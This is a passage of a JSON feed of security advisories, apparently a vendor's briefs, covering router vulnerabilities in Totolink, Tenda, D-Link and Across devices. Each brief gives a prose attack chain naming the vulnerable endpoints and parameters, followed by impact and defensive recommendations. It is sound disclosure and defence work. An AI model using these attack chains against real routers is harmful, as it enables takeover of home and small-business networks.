router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6194 can lead to complete compromise of the affected Totolink A3002MU router. This allows attackers to eavesdrop on network traffic, modify DNS settings, inject malicious code into web pages served to connected clients, or use the compromised router as a botnet node. Given the widespread use of these routers, a large number of devices could be at risk, potentially impacting home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/boafrm/formWlanSetup\u003c/code\u003e with unusually long \u003ccode\u003ewan-url\u003c/code\u003e parameters to detect potential exploitation attempts (see Sigma rule \u0026ldquo;Detect Suspicious WAN-URL Parameter Length\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect and alert on potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eIf possible, block requests matching the patterns identified in the Sigma rules at your network perimeter.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T12:00:00Z","date_published":"2026-04-14T12:00:00Z","id":"/briefs/2026-04-totolink-a3002mu-bo/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-6194) exists in the Totolink A3002MU B20211125.1046 router firmware, specifically affecting the `/boafrm/formWlanSetup` component's HTTP request handler, which allows remote attackers to execute arbitrary code by manipulating the `wan-url` argument.","title":"Totolink A3002MU Router Stack-Based Buffer Overflow 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-a3002mu-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6168"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["totolink","buffer-overflow","cve-2026-6168","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability, tracked as CVE-2026-6168, has been identified in TOTOLINK A7000R routers with firmware versions up to 9.1.0u.6115. The vulnerability resides within the \u003ccode\u003esetWiFiEasyGuestCfg\u003c/code\u003e function located in the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. Successful exploitation allows a remote attacker to execute arbitrary code on the device. Publicly available exploit code exists, increasing the risk of widespread exploitation. Given the widespread use of TOTOLINK devices, this vulnerability poses a significant threat to home and small business networks. Exploitation is possible with low privileges, as it only requires authentication to the device\u0026rsquo;s web interface.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the TOTOLINK A7000R web interface. 
This step assumes default credentials or compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes the \u003ccode\u003esetWiFiEasyGuestCfg\u003c/code\u003e function call.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003essid5g\u003c/code\u003e argument within the POST request is populated with a string exceeding the buffer\u0026rsquo;s capacity.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003esetWiFiEasyGuestCfg\u003c/code\u003e function in \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e processes the oversized \u003ccode\u003essid5g\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThis leads to a stack-based buffer overflow, overwriting adjacent memory regions.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the overflow to inject and execute arbitrary code on the device.\u003c/li\u003e\n\u003cli\u003eSuccessful code execution can grant the attacker full control of the router, enabling further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6168 allows a remote attacker to execute arbitrary code on the vulnerable TOTOLINK A7000R device. This can lead to complete compromise of the router, including the ability to intercept network traffic, modify DNS settings, inject malicious scripts into websites, and use the router as a pivot point for further attacks within the network. 
This vulnerability affects potentially thousands of devices, particularly in home and small business environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply firmware updates immediately if TOTOLINK releases a patch for CVE-2026-6168.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with unusually long \u003ccode\u003essid5g\u003c/code\u003e parameters, using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection systems (IDS) rules to detect attempts to exploit stack-based buffer overflows targeting TOTOLINK devices.\u003c/li\u003e\n\u003cli\u003eRestrict access to the router\u0026rsquo;s web interface to trusted IP addresses, if possible.\u003c/li\u003e\n\u003cli\u003eEnforce strong and unique passwords for all router accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-13T07:16:51Z","date_published":"2026-04-13T07:16:51Z","id":"/briefs/2026-04-totolink-buffer-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-6168) exists in TOTOLINK A7000R devices up to version 9.1.0u.6115, allowing remote attackers to execute arbitrary code via a crafted ssid5g argument to the setWiFiEasyGuestCfg function in /cgi-bin/cstecgi.cgi.","title":"TOTOLINK A7000R Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6157"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6157","buffer-overflow","router","iot"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical buffer overflow vulnerability, identified as CVE-2026-6157, has been discovered in Totolink A800R routers running firmware version 4.1.2cu.5137_B20200730. 
The vulnerability resides within the \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function in the \u003ccode\u003e/lib/cste_modules/app.so\u003c/code\u003e library. Successful exploitation allows remote attackers to potentially execute arbitrary code on the device. Publicly available exploits exist, increasing the risk of widespread exploitation. Routers are often the perimeter defense for networks, making them lucrative targets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink A800R router with firmware version 4.1.2cu.5137_B20200730 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes an overly long string as the value for the \u003ccode\u003eapcliSsid\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe router receives the HTTP request and passes the \u003ccode\u003eapcliSsid\u003c/code\u003e argument to the \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function copies the contents of \u003ccode\u003eapcliSsid\u003c/code\u003e into a fixed-size buffer without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe overly long \u003ccode\u003eapcliSsid\u003c/code\u003e string overflows the buffer, overwriting adjacent memory locations.\u003c/li\u003e\n\u003cli\u003eThe attacker carefully crafts the overflowed data to overwrite the return address of the function.\u003c/li\u003e\n\u003cli\u003eWhen the function returns, control is transferred to the attacker\u0026rsquo;s code, leading to arbitrary code execution. 
This could lead to the installation of malware or complete control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this buffer overflow vulnerability grants the attacker the ability to execute arbitrary code on the affected Totolink A800R router. This can result in complete compromise of the device, enabling the attacker to intercept network traffic, modify router settings, or use the router as a launching point for further attacks within the network. Given the availability of public exploits, a large number of devices could be vulnerable, making this a high-impact threat.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available firmware updates from Totolink to patch CVE-2026-6157.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious HTTP requests targeting the \u003ccode\u003esetAppEasyWizardConfig\u003c/code\u003e function, as described in the attack chain. 
Deploy the provided Sigma rule to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router.\u003c/li\u003e\n\u003cli\u003eIf updates are unavailable, consider replacing the vulnerable device.\u003c/li\u003e\n\u003cli\u003eDisable remote management access to the router to reduce the attack surface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-13T04:26:40Z","date_published":"2026-04-13T04:26:40Z","id":"/briefs/2026-04-totolink-a800r-buffer-overflow/","summary":"A remote buffer overflow vulnerability exists in the Totolink A800R router version 4.1.2cu.5137_B20200730, allowing unauthenticated attackers to potentially execute arbitrary code by overflowing the apcliSsid argument in the setAppEasyWizardConfig function within the /lib/cste_modules/app.so library.","title":"Totolink A800R Remote Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-totolink-a800r-buffer-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2019-25706"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2019-25706","file-disclosure","router","network"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Across DR-810 router contains an unauthenticated file disclosure vulnerability (CVE-2019-25706) that allows remote attackers to retrieve sensitive information. By sending a simple GET request to the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint, an attacker can download a backup file containing router passwords, configuration details, and potentially other sensitive data. This vulnerability exists because the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint does not require authentication, allowing anyone with network access to the router to retrieve the backup file. 
Successful exploitation leads to complete compromise of the device\u0026rsquo;s configuration and potential lateral movement within the network if credentials are reused. This vulnerability was published on 2026-04-12.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies an Across DR-810 router exposed on the network.\u003c/li\u003e\n\u003cli\u003eAttacker crafts an HTTP GET request targeting the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe router responds with the \u003ccode\u003erom-0\u003c/code\u003e backup file without requiring authentication.\u003c/li\u003e\n\u003cli\u003eAttacker downloads the \u003ccode\u003erom-0\u003c/code\u003e backup file.\u003c/li\u003e\n\u003cli\u003eAttacker decompresses the downloaded \u003ccode\u003erom-0\u003c/code\u003e file, which is likely compressed to reduce size.\u003c/li\u003e\n\u003cli\u003eThe attacker parses the decompressed file to extract sensitive information such as router passwords.\u003c/li\u003e\n\u003cli\u003eAttacker uses the extracted router passwords to gain administrative access to the router\u0026rsquo;s web interface.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows attackers to retrieve sensitive information, including router passwords and configuration data. This can lead to complete compromise of the affected router. An attacker can then modify router settings, intercept network traffic, or potentially use the compromised router as a pivot point to access other systems on the network. 
If the router passwords are reused across multiple systems, the impact could extend beyond the compromised router, affecting other devices and services.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint on Across DR-810 routers to detect potential exploitation attempts using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eInspect network traffic for unusual downloads from Across DR-810 routers, focusing on responses from the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eBlock access to the \u003ccode\u003e/rom-0\u003c/code\u003e endpoint on Across DR-810 routers via firewall rules to prevent unauthorized access.\u003c/li\u003e\n\u003cli\u003eReview the provided reference URLs for additional context and potential mitigation strategies.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-12T13:16:33Z","date_published":"2026-04-12T13:16:33Z","id":"/briefs/2026-04-across-dr810-file-disclosure/","summary":"Across DR-810 routers are vulnerable to unauthenticated file disclosure, allowing remote attackers to download the rom-0 backup file containing sensitive information, such as router passwords and configuration data, via a simple GET request to the rom-0 endpoint.","title":"Across DR-810 Unauthenticated File Disclosure Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-across-dr810-file-disclosure/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6120"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","router","buffer-overflow","cve-2026-6120","iot"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stack-based buffer overflow vulnerability has been identified in Tenda F451 router firmware version 1.0.0.7. 
The vulnerability resides in the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function within the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e component\u0026rsquo;s httpd service. A remote attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious \u003ccode\u003epage\u003c/code\u003e argument. This can lead to arbitrary code execution on the device. Given the public availability of the exploit (CVE-2026-6120), Tenda F451 routers are at immediate risk of compromise if not properly secured. This vulnerability poses a significant threat due to the widespread use of Tenda routers in home and small office environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda F451 router running vulnerable firmware version 1.0.0.7.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP GET or POST request targeting the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a \u003ccode\u003epage\u003c/code\u003e argument with a string exceeding the buffer size allocated for it in the \u003ccode\u003efromDhcpListClient\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e service on the router receives the malicious request and passes the \u003ccode\u003epage\u003c/code\u003e argument to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efromDhcpListClient\u003c/code\u003e function attempts to copy the oversized \u003ccode\u003epage\u003c/code\u003e argument into a fixed-size buffer on the stack, causing a buffer overflow.\u003c/li\u003e\n\u003cli\u003eThe overflow overwrites adjacent stack memory, including the return address of the function.\u003c/li\u003e\n\u003cli\u003eThe attacker controls the overwritten return address, redirecting execution to attacker-controlled code or a ROP 
chain.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router, potentially leading to complete device compromise and network access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to complete compromise of the Tenda F451 router. This allows attackers to control the device, intercept network traffic, change DNS settings, inject malicious scripts into web pages served to connected devices, or use the router as a pivot point for further attacks within the network. This vulnerability affects all users of the Tenda F451 router running firmware version 1.0.0.7, potentially impacting thousands of devices globally. Given the high CVSS score of 8.8, the risk is substantial.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting the \u003ccode\u003e/goform/DhcpListClient\u003c/code\u003e endpoint, especially those with unusually long \u003ccode\u003epage\u003c/code\u003e parameters (refer to the rule \u003ccode\u003eTenda F451 Suspicious URI Length\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eInspect network traffic for abnormal patterns related to compromised routers (unusual DNS requests, connections to known malicious IPs).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting and input validation on web server endpoints where possible to mitigate buffer overflow attempts.\u003c/li\u003e\n\u003cli\u003eApply any available firmware updates from Tenda to patch CVE-2026-6120, although patches may not be available.\u003c/li\u003e\n\u003cli\u003eConsider deploying network intrusion detection systems (NIDS) to identify and block exploitation attempts (refer to the \u003ccode\u003eTenda F451 Buffer Overflow Attempt\u003c/code\u003e 
rule).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-12T12:00:00Z","date_published":"2026-04-12T12:00:00Z","id":"/briefs/2026-04-tenda-f451-bo/","summary":"A remote stack-based buffer overflow vulnerability exists in the fromDhcpListClient function of the /goform/DhcpListClient component (httpd) within Tenda F451 firmware version 1.0.0.7, triggered by manipulating the 'page' argument, potentially allowing for arbitrary code execution.","title":"Tenda F451 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f451-bo/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6122"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6122","buffer-overflow","router","tenda"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical stack-based buffer overflow vulnerability has been identified in Tenda F451 router version 1.0.0.7. The vulnerability resides within the \u003ccode\u003efrmL7ProtForm\u003c/code\u003e function of the \u003ccode\u003e/goform/L7Prot\u003c/code\u003e component, specifically within the \u003ccode\u003ehttpd\u003c/code\u003e service. A remote attacker can exploit this flaw by crafting a malicious request targeting the \u003ccode\u003epage\u003c/code\u003e argument. Successful exploitation allows the attacker to execute arbitrary code on the device. Publicly available exploit code exists, increasing the risk of widespread exploitation. 
This vulnerability poses a significant threat to affected devices, potentially leading to full device compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Tenda F451 router running firmware version 1.0.0.7.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTTP GET or POST request targeting the \u003ccode\u003e/goform/L7Prot\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes the \u003ccode\u003epage\u003c/code\u003e argument with a payload exceeding the buffer size allocated for it within the \u003ccode\u003efrmL7ProtForm\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e service processes the request without proper bounds checking on the \u003ccode\u003epage\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe oversized payload overflows the stack buffer during the execution of the \u003ccode\u003efrmL7ProtForm\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites adjacent memory regions on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled return address redirects execution to attacker-supplied code or a return-oriented programming (ROP) chain.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the router, potentially gaining full control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary code on the affected Tenda F451 router. This can lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the device as a bot in a botnet. Given the availability of public exploits, vulnerable devices are at high risk of compromise. 
The number of potentially affected devices is substantial, as the Tenda F451 is a widely used router model.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/goform/L7Prot\u003c/code\u003e with unusually long \u003ccode\u003epage\u003c/code\u003e parameters, deploying the Sigma rule \u003ccode\u003eDetect Tenda F451 Buffer Overflow Attempt\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eSince no patch is available, consider replacing the Tenda F451 1.0.0.7 with a more secure router or firewall solution.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised router on other network devices.\u003c/li\u003e\n\u003cli\u003eDisable remote administration access to the router to reduce the attack surface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-12T08:16:37Z","date_published":"2026-04-12T08:16:37Z","id":"/briefs/2026-04-tenda-f451-overflow/","summary":"Tenda F451 router version 1.0.0.7 is vulnerable to a stack-based buffer overflow in the frmL7ProtForm function, enabling remote attackers to execute arbitrary code by manipulating the 'page' argument.","title":"Tenda F451 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-f451-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-6121"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-6121","buffer-overflow","tenda","router"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-6121 is a stack-based buffer overflow vulnerability affecting Tenda F451 router version 1.0.0.7. 
The vulnerability resides within the \u003ccode\u003eWrlclientSet\u003c/code\u003e function located in the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e file of the \u003ccode\u003ehttpd\u003c/code\u003e component. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the affected router, specifically manipulating the \u003ccode\u003eGO\u003c/code\u003e argument. Due to insufficient bounds checking on the \u003ccode\u003eGO\u003c/code\u003e argument\u0026rsquo;s size when passed to the \u003ccode\u003eWrlclientSet\u003c/code\u003e function, an attacker can write beyond the allocated buffer on the stack, potentially leading to arbitrary code execution. Publicly available exploits exist, increasing the risk of widespread exploitation. Routers that are accessible from the internet are at highest risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Tenda F451 router version 1.0.0.7 exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the HTTP POST request, the attacker includes the \u003ccode\u003eGO\u003c/code\u003e argument, filling it with a payload exceeding the buffer size allocated for it within the \u003ccode\u003eWrlclientSet\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ehttpd\u003c/code\u003e component of the Tenda F451 router receives the HTTP request and passes the \u003ccode\u003eGO\u003c/code\u003e argument to the vulnerable \u003ccode\u003eWrlclientSet\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to the buffer overflow, the attacker\u0026rsquo;s payload overwrites adjacent memory locations on the stack.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s payload overwrites the return address on the stack, redirecting 
execution flow to attacker-controlled code.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled code executes with the privileges of the \u003ccode\u003ehttpd\u003c/code\u003e process, allowing the attacker to perform actions such as modifying router configuration, executing system commands, or establishing a reverse shell.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the router and potentially the internal network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-6121 can lead to complete compromise of the affected Tenda F451 router. An attacker can gain unauthorized access to the device\u0026rsquo;s configuration, potentially modifying DNS settings, firewall rules, or other critical parameters. This can lead to redirection of user traffic, denial-of-service attacks, or the establishment of a foothold within the targeted network for further malicious activities. Given the ease of exploitation due to the publicly available exploit code, a large number of Tenda F451 routers could be compromised.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e with abnormally long \u003ccode\u003eGO\u003c/code\u003e parameter values to detect potential exploitation attempts (see Sigma rule below and enable webserver logging).\u003c/li\u003e\n\u003cli\u003eImplement rate limiting for requests to the \u003ccode\u003e/goform/WrlclientSet\u003c/code\u003e endpoint to mitigate potential brute-force exploitation attempts (configure your firewall or WAF).\u003c/li\u003e\n\u003cli\u003eUpgrade to a patched firmware version when available or replace the affected devices, if the vendor does not provide a 
fix.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-12T08:16:36Z","date_published":"2026-04-12T08:16:36Z","id":"/briefs/2026-04-tenda-overflow/","summary":"A stack-based buffer overflow vulnerability (CVE-2026-6121) exists in the WrlclientSet function of the /goform/WrlclientSet file in the httpd component of Tenda F451 version 1.0.0.7, allowing remote attackers to execute arbitrary code by manipulating the GO argument.","title":"Tenda F451 Stack-Based Buffer Overflow Vulnerability (CVE-2026-6121)","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-overflow/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5989"}],"_cs_exploited":true,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["tenda","router","buffer_overflow","rce"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eA critical vulnerability, identified as CVE-2026-5989, affects the Tenda F451 router, specifically version 1.0.0.7. The vulnerability lies within the \u003ccode\u003efromRouteStatic\u003c/code\u003e function of the \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e file. By manipulating the \u003ccode\u003epage\u003c/code\u003e argument, a remote attacker can trigger a stack-based buffer overflow, potentially leading to arbitrary code execution. Publicly available exploit code exists, increasing the risk of exploitation. 
This vulnerability poses a significant threat as it allows unauthenticated remote attackers to compromise the router, potentially leading to network disruption, data theft, or use of the device in botnet activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Tenda F451 router (version 1.0.0.7) exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes a \u003ccode\u003epage\u003c/code\u003e argument with a payload designed to overflow the stack buffer in the \u003ccode\u003efromRouteStatic\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003efromRouteStatic\u003c/code\u003e function processes the malicious \u003ccode\u003epage\u003c/code\u003e argument without proper bounds checking.\u003c/li\u003e\n\u003cli\u003eThe buffer overflow overwrites critical data on the stack, including the return address.\u003c/li\u003e\n\u003cli\u003eUpon function return, control is redirected to the attacker-controlled memory region.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code injected into the overflowed buffer, such as downloading and executing a reverse shell.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access to the router, potentially allowing further exploitation or network compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5989 allows an attacker to gain complete control of the Tenda F451 router. This can lead to a variety of damaging outcomes, including denial-of-service attacks against the local network, interception of network traffic, modification of router settings, and the potential use of the compromised router as a node in a botnet. 
Given the widespread use of Tenda routers in home and small business environments, a large number of devices could be at risk if this vulnerability is actively exploited.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e containing abnormally long \u003ccode\u003epage\u003c/code\u003e arguments, as this is indicative of potential exploit attempts. Deploy the Sigma rule \u003ccode\u003eDetect Tenda F451 Exploit Attempt\u003c/code\u003e to detect these malicious requests.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on requests to the \u003ccode\u003e/goform/RouteStatic\u003c/code\u003e endpoint to mitigate potential denial-of-service attacks.\u003c/li\u003e\n\u003cli\u003eSince there is no patch available, consider replacing vulnerable Tenda F451 routers with more secure devices from other vendors.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-10T00:16:36Z","date_published":"2026-04-10T00:16:36Z","id":"/briefs/2026-04-tenda-rce/","summary":"A stack-based buffer overflow vulnerability in the Tenda F451 router (version 1.0.0.7) allows remote attackers to execute arbitrary code by manipulating the 'page' argument in the fromRouteStatic function of the /goform/RouteStatic file.","title":"Tenda F451 Router Stack-Based Buffer Overflow Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-tenda-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-5980"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve","buffer_overflow","router","d-link"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-5980 is a critical buffer overflow vulnerability affecting the D-Link DIR-605L router, specifically version 2.13B01. 
